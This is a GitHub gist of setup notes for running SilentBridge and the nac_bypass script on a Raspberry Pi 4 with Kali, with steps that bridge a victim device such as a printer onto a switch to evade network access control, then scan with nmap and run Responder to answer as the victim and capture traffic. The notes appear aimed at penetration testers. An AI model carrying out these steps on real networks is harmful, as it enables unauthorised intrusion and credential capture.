@l4rm4nd
Last active July 12, 2025 16:53
SilentBridge on Raspberry Pi 4 (kali-linux-2025.2-raspberry-pi-arm64.img)
# install dependencies for netifaces
sudo apt install python2-dev -y
# get python2 pip
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python2.7 get-pip.py
rm get-pip.py
# downgrade virtualenv to support python2.7 venvs
# see https://github.com/pypa/virtualenv/releases/tag/20.22.0 - drops python2.7 support
pip install virtualenv==20.21.1 --break-system-packages --ignore-installed
# clone silentbridge
git clone https://github.com/s0lst1c3/silentbridge && cd silentbridge
# create venv for python2.7
virtualenv -p $(which python2) venv2
source venv2/bin/activate
# install silentbridge dependencies
pip install scapy==2.4.3 --ignore-installed
pip install netifaces
pip install nanpy
# test run silentbridge
python2 ./silentbridge
l4rm4nd commented Jun 27, 2025

From https://github.com/scipag/nac_bypass

# install dependencies
# not needed if you run kali linux
sudo apt-get install -y bridge-utils ethtool macchanger arptables ebtables iptables net-tools tcpdump

# load kernel module
sudo modprobe br_netfilter
# verify it's loaded
lsmod | grep br_netfilter

# append to kernel modules
echo br_netfilter | sudo tee -a /etc/modules

# enable IP forwarding
sudo nano /etc/sysctl.conf

# and uncomment/put this line with no hashtag
# net.ipv4.ip_forward = 1

# clone repo
cd
git clone https://github.com/scipag/nac_bypass && cd nac_bypass

# test run
sudo su
chmod +x nac_bypass_setup.sh
./nac_bypass_setup.sh -h

The actual NAC bypass looks like this:

  1. Connect the switch to eth0 (native LAN interface of RPi4)
  2. Connect victim (e.g. printer) to eth1 (external USB LAN adapter)
  3. Then start the nac bypass:
# by default it will treat the lower interface device as switch side, and the next one as victim
./nac_bypass_setup.sh -1 eth0 -2 eth1

# script will ask to wait some time, so it is able to dump the needed info from the network traffic
# afterwards, you can proceed and for instance do an nmap scan on the network

Warning

As for Responder: Things got a little confusing for me at first.

You can look up the iptables rules like so to see what is going on: iptables -t nat -L

The nac bypass script will put rules in place that reroute all traffic intended for the client, let's say port 445, to your bridge. So Responder needs to be set up to listen on the bridge interface, but change the answering IP address to the one of the victim:

./Responder.py -I br0 -e victim.ip
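
To make the NAT table easier to read, the rule-spec form of the listing (`iptables -t nat -S`) can be condensed to one line per destination-rewriting rule. This is an added example, not part of the gist or of nac_bypass: `summarize_nat`, `sample_rules` and the sample rules (documentation addresses) are constructed, and the rules the script actually installs are not shown on this page.

```shell
#!/usr/bin/env bash
# Condense `iptables -t nat -S` output to one line per DNAT/REDIRECT rule.
# On a live system: iptables -t nat -S | summarize_nat

summarize_nat() {
  awk '
    $1 == "-A" {
      chain = $2
      proto = "any"; dst = "any"; dport = "any"; iface = "any"
      target = ""; to = "-"
      # Walk the rule spec and pick out the match fields and the target.
      for (i = 3; i <= NF; i++) {
        if      ($i == "-p")      proto  = $(i+1)
        else if ($i == "-d")      dst    = $(i+1)
        else if ($i == "-i")      iface  = $(i+1)
        else if ($i == "--dport") dport  = $(i+1)
        else if ($i == "-j")      target = $(i+1)
        else if ($i == "--to-destination" || $i == "--to-ports") to = $(i+1)
      }
      # Only rules that rewrite the destination are of interest here.
      if (target == "DNAT" || target == "REDIRECT")
        printf "%s in=%s %s %s:%s -> %s\n", chain, iface, proto, dst, dport, to
    }'
}

# Constructed sample listing (assumption: 192.0.2.50 stands in for the
# bridged client, 198.51.100.66 for the bridge address).
sample_rules() {
  cat <<'EOF'
-P PREROUTING ACCEPT
-P POSTROUTING ACCEPT
-A PREROUTING -d 192.0.2.50/32 -i br0 -p tcp -m tcp --dport 445 -j DNAT --to-destination 198.51.100.66:445
-A PREROUTING -d 192.0.2.50/32 -i br0 -p udp -m udp --dport 137 -j DNAT --to-destination 198.51.100.66:137
-A POSTROUTING -o br0 -p tcp -j SNAT --to-source 192.0.2.50:61000-62000
EOF
}

sample_rules | summarize_nat
```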
